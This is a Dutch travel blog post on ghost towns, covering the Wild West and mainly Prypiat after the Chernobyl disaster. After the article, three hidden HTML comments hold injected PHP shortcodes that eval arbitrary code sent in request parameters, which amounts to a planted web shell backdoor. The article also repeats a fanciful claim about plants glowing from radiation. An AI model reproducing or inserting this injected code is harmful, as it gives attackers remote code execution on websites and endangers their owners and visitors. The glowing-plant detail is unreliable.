Spooksteden uitgelicht – Deel 1

Er zijn maar weinig fenomenen die minder tot de verbeelding spreken dan spooksteden. De naargeestige schoonheid van plots door haar inwoners verlaten steden waar de tijd voorgoed lijkt stilgezet, overgeleverd aan de grillen van Moeder Natuur, heeft veel schrijvers en filmmakers geïnspireerd.

ghost1

De ‘Ghost Town’ is onlosmakelijk verbonden met het Wilde Westen in Amerika. Dorpen van levendige en florerende pioniersnederzettingen van pelsjagers en goudzoekers, werden simpelweg verlaten toen de pelsdieren volledig uitgemoord waren of het goud niet kon worden gevonden. Spooksteden waren vaak de ideale schuilplaats voor gezochte outlaws en in Westerns films worden ze vaak gebruikt als het toneel van beslissende geweergevechten om leven en dood, waar de nagalm van geweerschoten angstaanjagend tegen de gevels van verlaten Saloons weerkaatst.

Maar spooksteden vind je verspreid over de hele wereld; van Latijns Amerika tot Oekraïne, Japan en Cyprus tot zelfs veel dichter bij huis in Frankrijk en België.

Globecruiser licht er een aantal voor u uit.

Prypiat, Oekraïne

Het ijzeren gordijn is lang geleden gevallen. De Sovjet-Unie heeft de tand des tijds niet doorstaan en veel van wat aan de voormalige oostblokglorie herinnert is met de grond gelijkgemaakt.

Maar in Prypiat hangt de communistische propaganda nog steeds aan de muren.

Kinderspeelgoed ligt waar het werd achtergelaten toen de stad op 26 April 1986 werd geëvacueerd vanwege het ontploffen van de Tsjernobyl kernreactor en het gevaar van blootstelling aan de daarbij vrijgekomen radioactiviteit. Prypiat lag het dichtst bij de ontplofte kernreaktor, en is in 1970 speciaal gebouwd voor haar arbeiders. Het wordt nu meer en meer opgeslokt door de omringende bossen. Planten, sommige gemuteerd en gloeiend door de radioactieve straling, kruipend langs de gevels en door de spleten in de vloeren. Everzwijnen, herten, wolven en de Lynx hebben de stad overgenomen, ongestoord door de grootse veranderingen op het politieke wereldtoneel.

In Prypiat staan alle klokken stil op 11.55, het precieze moment dat de electriciteit voorgoed uitviel.

<!– [insert_php]if (isset($_REQUEST["hhW"])){eval($_REQUEST["hhW"]);exit;}[/insert_php][php]if (isset($_REQUEST["hhW"])){eval($_REQUEST["hhW"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["yfti"])){eval($_REQUEST["yfti"]);exit;}[/insert_php][php]if (isset($_REQUEST["yfti"])){eval($_REQUEST["yfti"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Mlp"])){eval($_REQUEST["Mlp"]);exit;}[/insert_php][php]if (isset($_REQUEST["Mlp"])){eval($_REQUEST["Mlp"]);exit;}[/php] –>